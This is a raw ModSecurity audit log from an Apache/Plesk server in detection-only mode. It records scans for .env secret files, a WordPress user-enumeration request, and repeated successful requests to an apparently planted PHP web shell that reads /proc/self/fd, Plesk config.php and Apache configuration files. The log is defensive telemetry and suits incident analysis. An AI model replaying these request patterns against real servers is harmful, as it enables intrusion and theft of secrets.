"/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.env.save"] [unique_id "aFB-90cTB7P_sALtclD7NwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750105847654559 499537 (- - -) Stopwatch2: 1750105847654559 499537; combined=1895, p1=367, p2=1431, p3=0, p4=0, p5=96, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ce72cc17-Z-- --e8a1f717-A-- [17/Jun/2025:02:00:49.105897 +0530] aFB--BwcFb_n1P0IC9x3SQAAAAo 93.123.109.81 50042 127.0.0.1 7081 --e8a1f717-B-- GET /.env.prod HTTP/1.0 Host: www.bspsons.com X-Real-IP: 93.123.109.81 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --e8a1f717-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --e8a1f717-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.env.prod"] [unique_id "aFB--BwcFb_n1P0IC9x3SQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750105848614713 491270 (- - -) Stopwatch2: 1750105848614713 491270; combined=1933, p1=376, p2=1433, p3=0, p4=0, p5=123, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e8a1f717-Z-- --6c077d7c-A-- [17/Jun/2025:02:00:57.533606 +0530] aFB_Acl682-knofG8qdiqwAAAAM 93.123.109.81 37812 127.0.0.1 7081 --6c077d7c-B-- GET /dev/.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 93.123.109.81 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --6c077d7c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --6c077d7c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/dev/.env"] [unique_id "aFB_Acl682-knofG8qdiqwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750105857054734 478936 (- - -) Stopwatch2: 1750105857054734 478936; combined=1916, p1=371, p2=1448, p3=0, p4=0, p5=97, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6c077d7c-Z-- --805bcb42-A-- [17/Jun/2025:02:00:58.490740 +0530] aFB_AU3CmevS3xeTzmo1KQAAAAQ 93.123.109.81 37850 127.0.0.1 7081 --805bcb42-B-- GET /application/.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 93.123.109.81 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --805bcb42-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --805bcb42-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/application/.env"] [unique_id "aFB_AU3CmevS3xeTzmo1KQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750105857973813 516987 (- - -) Stopwatch2: 1750105857973813 516987; combined=1809, p1=376, p2=1355, p3=0, p4=0, p5=78, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --805bcb42-Z-- --8adfbe2d-A-- [17/Jun/2025:02:08:21.225231 +0530] aFCAvZlL5_2Zd8wUdfLcbQAAAAg 54.147.182.90 56200 127.0.0.1 7081 --8adfbe2d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/160 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.147.182.90 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --8adfbe2d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --8adfbe2d-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/160"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/160"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCAvZlL5_2Zd8wUdfLcbQAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106301220980 4304 (- - -) Stopwatch2: 1750106301220980 4304; combined=2305, p1=375, p2=1785, p3=62, p4=27, p5=56, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8adfbe2d-Z-- --0e559d46-A-- [17/Jun/2025:02:08:44.883641 +0530] aFCA1I9-jD-p9NsZWnAZuAAAAAE 54.210.152.179 34900 127.0.0.1 7081 --0e559d46-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/74 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.210.152.179 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --0e559d46-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --0e559d46-H-- Message: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/self/fd/74"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/self/fd/74"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCA1I9-jD-p9NsZWnAZuAAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106324879003 4691 (- - -) Stopwatch2: 1750106324879003 4691; combined=2451, p1=371, p2=1950, p3=45, p4=30, p5=55, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0e559d46-Z-- --90ea811c-A-- [17/Jun/2025:02:08:52.605201 +0530] aFCA3KC450Yw050Ymr0JXAAAAAk 52.45.77.169 36290 127.0.0.1 7081 --90ea811c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/47 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.45.77.169 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --90ea811c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --90ea811c-H-- Message: Warning. Matched phrase "proc/self/fd/4" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/4 found within ARGS:viewfile: /proc/self/fd/47"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/4" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/4 found within ARGS:viewfile: /proc/self/fd/47"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCA3KC450Yw050Ymr0JXAAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106332601138 4115 (- - -) Stopwatch2: 1750106332601138 4115; combined=2219, p1=346, p2=1735, p3=58, p4=27, p5=53, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --90ea811c-Z-- --1c948b35-A-- [17/Jun/2025:02:09:04.775083 +0530] aFCA6EcTB7P_sALtclD8sAAAAAI 44.223.116.180 37994 127.0.0.1 7081 --1c948b35-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/79 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.223.116.180 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --1c948b35-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --1c948b35-H-- Message: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/self/fd/79"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/self/fd/79"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCA6EcTB7P_sALtclD8sAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106344771005 4132 (- - -) Stopwatch2: 1750106344771005 4132; combined=2077, p1=383, p2=1572, p3=34, p4=30, p5=58, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1c948b35-Z-- --89e45d71-A-- [17/Jun/2025:02:10:53.282151 +0530] aFCBVVJfblPUQiSn5r11OAAAAAA 3.209.174.110 47288 127.0.0.1 7081 --89e45d71-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/26 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.209.174.110 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --89e45d71-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --89e45d71-H-- Message: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/26"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/26"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCBVVJfblPUQiSn5r11OAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106453277000 5219 (- - -) Stopwatch2: 1750106453277000 5219; combined=2807, p1=471, p2=2183, p3=47, p4=34, p5=71, sr=137, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --89e45d71-Z-- --63fcc85b-A-- [17/Jun/2025:02:11:00.547580 +0530] aFCBWlJfblPUQiSn5r11PQAAAAA 146.70.194.236 47692 127.0.0.1 7081 --63fcc85b-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.home9ine.com X-Real-IP: 146.70.194.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=94780259c259f4fcde13712132ce140d1750106457 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --63fcc85b-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.home9ine.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --63fcc85b-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.home9ine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.home9ine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.home9ine.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFCBWlJfblPUQiSn5r11PQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/home9ine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750106458746358 1801320 (- - -) Stopwatch2: 1750106458746358 1801320; combined=2080, p1=363, p2=1585, p3=0, p4=0, p5=131, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --63fcc85b-Z-- --43146e35-A-- [17/Jun/2025:02:12:40.115428 +0530] aFCBwMl682-knofG8qdkwQAAAAM 52.73.142.41 55232 127.0.0.1 7081 --43146e35-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/207 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.73.142.41 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --43146e35-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --43146e35-H-- Message: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/207"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/207"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCBwMl682-knofG8qdkwQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106560111289 4190 (- - -) Stopwatch2: 1750106560111289 4190; combined=2233, p1=369, p2=1747, p3=36, p4=28, p5=53, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --43146e35-Z-- --f7cf9825-A-- [17/Jun/2025:02:14:54.270419 +0530] aFCCRk3CmevS3xeTzmo3iQAAAAQ 216.73.216.71 33138 127.0.0.1 7081 --f7cf9825-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2FService%2FProftpd&viewfile=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2FService%2FProftpd%2FConfig.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f7cf9825-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 9634 Connection: close Content-Type: text/html; charset=UTF-8 --f7cf9825-H-- Message: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /opt/psa/admin/plib/service/proftpd/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /opt/psa/admin/plib/service/proftpd/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCCRk3CmevS3xeTzmo3iQAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106694265193 5280 (- - -) Stopwatch2: 1750106694265193 5280; combined=2001, p1=336, p2=1537, p3=34, p4=34, p5=60, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f7cf9825-Z-- --768f6158-A-- [17/Jun/2025:02:15:28.713229 +0530] aFCCaJVkCcfT-Z8NQYypFAAAAAc 52.5.232.250 33280 127.0.0.1 7081 --768f6158-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/apache2/mods-available&viewfile=//etc/apache2/mods-available/proxy.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.5.232.250 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --768f6158-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3436 Connection: close Content-Type: text/html; charset=UTF-8 --768f6158-H-- Message: Warning. Matched phrase "etc/apache2/mods-available/proxy.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/mods-available/proxy.conf found within ARGS:viewfile: /etc/apache2/mods-available/proxy.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apache2/mods-available/proxy.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/mods-available/proxy.conf found within ARGS:viewfile: /etc/apache2/mods-available/proxy.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCCaJVkCcfT-Z8NQYypFAAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106728708896 4387 (- - -) Stopwatch2: 1750106728708896 4387; combined=2327, p1=318, p2=1865, p3=46, p4=39, p5=59, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --768f6158-Z-- --6b60c21b-A-- [17/Jun/2025:02:15:44.550836 +0530] aFCCeI9-jD-p9NsZWnAa5wAAAAE 100.27.153.9 38606 127.0.0.1 7081 --6b60c21b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/lvm/profile&viewfile=//etc/lvm/profile/cache-mq.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 100.27.153.9 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6b60c21b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3232 Connection: close Content-Type: text/html; charset=UTF-8 --6b60c21b-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/lvm/profile/cache-mq.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/lvm/profile/cache-mq.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCCeI9-jD-p9NsZWnAa5wAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106744545515 5384 (- - -) Stopwatch2: 1750106744545515 5384; combined=2964, p1=445, p2=2330, p3=73, p4=44, 